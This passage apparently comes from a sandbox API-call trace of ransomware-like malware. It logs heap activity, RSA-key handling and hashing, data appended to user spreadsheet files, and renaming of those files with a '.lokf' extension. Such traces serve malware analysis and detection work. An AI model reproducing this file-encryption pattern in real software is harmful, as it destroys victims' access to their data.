Size=0x8) returned 0x3278f60 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ce0 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c85cc8 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f10 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x32425c8 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ce0 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cc8 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3296380 | out: hHeap=0x660000) returned 1 [0060.289] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.289] GetCurrentThreadId () returned 0x9e0 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8a370 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b8720 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.289] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.290] GetCurrentThreadId () returned 0x9e0 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e2e8 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e2e8 | out: hHeap=0x660000) returned 1 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857d0 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85cc8 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f20 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f90 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278fa0 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f80 [0060.290] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85ce0 [0060.290] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278fa0 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x3242348 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f90 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c85cb0 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f80 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85770 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f30 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f70 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f30 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857e8 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85cf8 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c857b8 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857e8 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f60 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3240c48 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1c) returned 0x328e3b0 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cc8 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c85cc8 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f20 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x204) returned 0x9c711f0 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857d0 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x3245508 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x210) returned 0x326a370 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10c) returned 0x3234418 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f00 | out: hHeap=0x660000) returned 1 [0060.291] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x108) returned 0x32453f0 [0060.291] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cc8 | out: hHeap=0x660000) returned 1 [0060.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x200) returned 0x326a588 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3245508 | out: hHeap=0x660000) returned 1 [0060.292] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f908 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x6b8720 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f908 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3240c48 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32453f0 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a588 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cf8 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85770 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242348 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85ce0 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85cb0 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3201228 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257198 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f6f8 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c85c98 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c88fc8 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326fa10 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3261528 | out: hHeap=0x660000) returned 1 [0060.292] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32452d8 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3242688 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278ec0 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0060.293] WriteFile (in: hFile=0x5cc, lpBuffer=0x9c8bae8*, nNumberOfBytesToWrite=0x6f3c, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x9c8bae8*, lpNumberOfBytesWritten=0x9f4fb14*=0x6f3c, lpOverlapped=0x0) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c8bae8 | out: hHeap=0x660000) returned 1 [0060.293] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x6f41, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.293] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f800 | out: hHeap=0x660000) returned 1 [0060.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0060.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x326a370 [0060.293] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x326a370, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0060.293] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x32947b0 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326a370 | out: hHeap=0x660000) returned 1 [0060.293] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0060.293] WriteFile (in: hFile=0x5cc, lpBuffer=0x32947b0*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x32947b0*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0060.294] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0060.294] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.294] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.294] CloseHandle (hObject=0x5cc) returned 1 [0060.295] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd0) returned 0x31e9450 [0060.295] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\6P7rf5fA1SneQ8RjIP.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\6p7rf5fa1sneq8rjip.ods"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\6P7rf5fA1SneQ8RjIP.ods.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\6p7rf5fa1sneq8rjip.ods.lokf")) returned 1 [0060.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0060.295] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0060.295] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.296] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0060.296] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf7490180, ftCreationTime.dwHighDateTime=0x1d4d23a, ftLastAccessTime.dwLowDateTime=0xda038c30, ftLastAccessTime.dwHighDateTime=0x1d4cd8f, ftLastWriteTime.dwLowDateTime=0xda038c30, ftLastWriteTime.dwHighDateTime=0x1d4cd8f, nFileSizeHigh=0x0, nFileSizeLow=0x1031b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="7GGLnQdzt-Q9-.ots", cAlternateFileName="7GGLNQ~1.OTS")) returned 1 [0060.296] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\7GGLnQdzt-Q9-.ots") returned=".ots" [0060.296] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\7GGLnQdzt-Q9-.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\7gglnqdzt-q9-.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0060.297] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=66331) returned 1 [0060.297] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0060.299] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x102f5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.299] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0060.300] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x1031b, lpOverlapped=0x0) returned 1 [0060.300] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.301] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0060.301] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b8720) returned 1 [0060.301] CryptCreateHash (in: hProv=0x6b8720, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0060.301] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0060.301] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0060.301] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0060.301] GetLastError () returned 0x0 [0060.301] CryptDestroyHash (hHash=0x327cb80) returned 1 [0060.301] CryptReleaseContext (hProv=0x6b8720, dwFlags=0x0) returned 1 [0060.302] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0060.302] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0060.302] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0060.302] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0060.302] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0060.302] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x1031b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0060.302] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f800*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f800*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0060.303] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0060.303] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0060.303] CloseHandle (hObject=0x5cc) returned 1 [0060.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc0) returned 0x3228c60 [0060.304] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8d0) returned 0x3268798 [0060.304] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\7GGLnQdzt-Q9-.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\7gglnqdzt-q9-.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\xw_W- RtiM1Q0r\\mw2tK3t ch7R6yApjv\\7GGLnQdzt-Q9-.ots.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\xw_w- rtim1q0r\\mw2tk3t ch7r6yapjv\\7gglnqdzt-q9-.ots.lokf")) returned 1 [0060.305] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c00820, ftCreationTime.dwHighDateTime=0x1d4d06a, ftLastAccessTime.dwLowDateTime=0x21cd84c0, ftLastAccessTime.dwHighDateTime=0x1d4c9a9, ftLastWriteTime.dwLowDateTime=0x21cd84c0, ftLastWriteTime.dwHighDateTime=0x1d4c9a9, nFileSizeHigh=0x0, 